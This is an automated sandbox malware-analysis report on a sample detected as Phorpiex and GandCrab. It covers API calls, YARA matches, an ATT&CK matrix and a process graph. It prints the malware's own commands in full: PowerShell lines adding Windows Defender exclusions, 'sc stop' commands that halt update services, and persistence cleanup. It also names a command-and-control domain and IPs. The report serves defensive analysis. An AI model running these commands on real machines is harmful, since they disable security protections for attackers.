                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00407C78 VirtualQuery,GetSystemInfo,0_2_00407C78
                              Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 40000Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 102655Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 111360Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189354582.000000000289D000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.000000000074D000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeAPI call chain: ExitProcess graph end nodegraph_0-52623
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004581CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004581CE
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004C9CC0 mov eax, dword ptr fs:[00000030h]0_2_004C9CC0
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004073CD GetProcessHeap,HeapAlloc,0_2_004073CD
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004581CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004581CE
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00451908 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00451908
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00451D9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00451D9F
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00451F2C SetUnhandledExceptionFilter,0_2_00451F2C
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeCode function: 2_2_00C91B68 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_00C91B68
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004689CF InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_004689CF
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00466447 AllocateAndInitializeSid,CheckTokenMembership,0_2_00466447
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00452045 cpuid 0_2_00452045
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: GetLocaleInfoA,strcmp,3_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,4_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,17_2_0040F1B0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2355412914.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0046E9BB CreateNamedPipeW,GetLastError,0_2_0046E9BB
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00405E84 GetLocalTime,CreateFileW,GetLastError,Sleep,CloseHandle,0_2_00405E84
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0040AAD0 GetUserNameW,GetLastError,0_2_0040AAD0
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00475E11 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_00475E11

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Changes security center settings (notifications, updates, antivirus, firewall)
                              Source: C:\Windows\sysppvrdnvs.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior
                              Stops critical windows services
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

                              Remote Access Functionality

                              barindex
                              Yara detected Phorpiex
                              Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.71384504.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.0.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.2.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.71384504.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 71384504.exe PID: 7464, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 7488, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 8108, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 2658326577.exe PID: 1400, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2658326577.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\71384504.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,3_2_00401470
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,3_2_0040E190
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread,3_2_004013B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040E190
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,17_2_00401470
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,17_2_00402020
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,17_2_0040E190
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004013B0 CreateEventA,socket,bind,CreateThread,17_2_004013B0

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		31
                              Disable or Modify Tools                              		11
                              Input Capture                              		12
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		12
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts3
                              Command and Scripting Interpreter                              		12
                              Windows Service                              		1
                              Access Token Manipulation                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Account Discovery                              		Remote Desktop Protocol11
                              Input Capture                              		2
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		12
                              Windows Service                              		2
                              Obfuscated Files or Information                              		Security Account Manager1
                              System Network Connections Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		1
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts2
                              Service Execution                              		1
                              Registry Run Keys / Startup Folder                              		12
                              Process Injection                              		1
                              DLL Side-Loading                              		NTDS2
                              File and Directory Discovery                              		Distributed Component Object ModelInput Capture2
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                              Scheduled Task/Job                              		121
                              Masquerading                              		LSA Secrets35
                              System Information Discovery                              		SSHKeylogging22
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                              Registry Run Keys / Startup Folder                              		1
                              Modify Registry                              		Cached Domain Credentials231
                              Security Software Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                              Virtualization/Sandbox Evasion                              		DCSync2
                              Process Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Access Token Manipulation                              		Proc Filesystem31
                              Virtualization/Sandbox Evasion                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadow1
                              Application Window Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Hidden Files and Directories                              		Network Sniffing1
                              System Owner/User Discovery                              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542686 Sample: thcdVit1dX.exe Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 86 twizt.net 2->86 106 Multi AV Scanner detection for domain / URL 2->106 108 Suricata IDS alerts for network traffic 2->108 110 Found malware configuration 2->110 112 10 other signatures 2->112 12 thcdVit1dX.exe 20 2->12         started        17 sysppvrdnvs.exe 2->17         started        signatures3 process4 dnsIp5 94 twizt.net 185.215.113.66, 49720, 49721, 49771 WHOLESALECONNECTIONSNL Portugal 12->94 82 C:\Users\user\AppData\Local\Temp\4BBF.exe, PE32 12->82 dropped 84 C:\Users\user\AppData\Local\...\pei[1].exe, PE32 12->84 dropped 140 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->140 19 4BBF.exe 16 12->19         started        file6 signatures7 process8 file9 68 C:\Users\user\AppData\Local\...\71384504.exe, PE32 19->68 dropped 70 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 19->70 dropped 114 Multi AV Scanner detection for dropped file 19->114 116 Machine Learning detection for dropped file 19->116 118 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->118 23 71384504.exe 1 1 19->23         started        signatures10 process11 file12 72 C:\Windows\sysppvrdnvs.exe, PE32 23->72 dropped 120 Antivirus detection for dropped file 23->120 122 Multi AV Scanner detection for dropped file 23->122 124 Found evasive API chain (may stop execution after checking mutex) 23->124 126 5 other signatures 23->126 27 sysppvrdnvs.exe 10 25 23->27         started        signatures13 process14 dnsIp15 88 2.180.10.247, 40500 TCIIR Iran (ISLAMIC Republic Of) 27->88 90 2.184.189.189, 40500 TCIIR Iran (ISLAMIC Republic Of) 27->90 92 7 other IPs or domains 27->92 74 C:\Users\user\AppData\...\2658326577.exe, PE32 27->74 dropped 76 C:\Users\user\AppData\...\2355412914.exe, PE32+ 27->76 dropped 78 C:\Users\user\AppData\Local\...\651713841.exe, data 27->78 dropped 80 C:\Users\user\AppData\...\1863518468.exe, data 27->80 dropped 132 Antivirus detection for dropped file 27->132 134 Multi AV Scanner detection for dropped file 27->134 136 Found evasive API chain (may stop execution after checking mutex) 27->136 138 6 other signatures 27->138 32 2355412914.exe 2 27->32         started        35 cmd.exe 1 27->35         started        37 2658326577.exe 27->37         started        39 cmd.exe 1 27->39         started        file16 signatures17 process18 signatures19 96 Multi AV Scanner detection for dropped file 32->96 98 Machine Learning detection for dropped file 32->98 41 cmd.exe 32->41         started        44 cmd.exe 32->44         started        100 Adds a directory exclusion to Windows Defender 35->100 102 Stops critical windows services 35->102 46 powershell.exe 23 35->46         started        48 conhost.exe 35->48         started        104 Antivirus detection for dropped file 37->104 50 conhost.exe 39->50         started        52 sc.exe 1 39->52         started        54 sc.exe 1 39->54         started        56 3 other processes 39->56 process20 signatures21 128 Uses schtasks.exe or at.exe to add and modify task schedules 41->128 58 conhost.exe 41->58         started        60 reg.exe 41->60         started        62 conhost.exe 44->62         started        64 schtasks.exe 44->64         started        130 Loading BitLocker PowerShell Module 46->130 66 WmiPrvSE.exe 46->66         started        process22

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              thcdVit1dX.exe66%ReversingLabsWin32.Ransomware.GandCrab
                              thcdVit1dX.exe62%VirustotalBrowse
                              thcdVit1dX.exe100%AviraW32/Infector.Gen
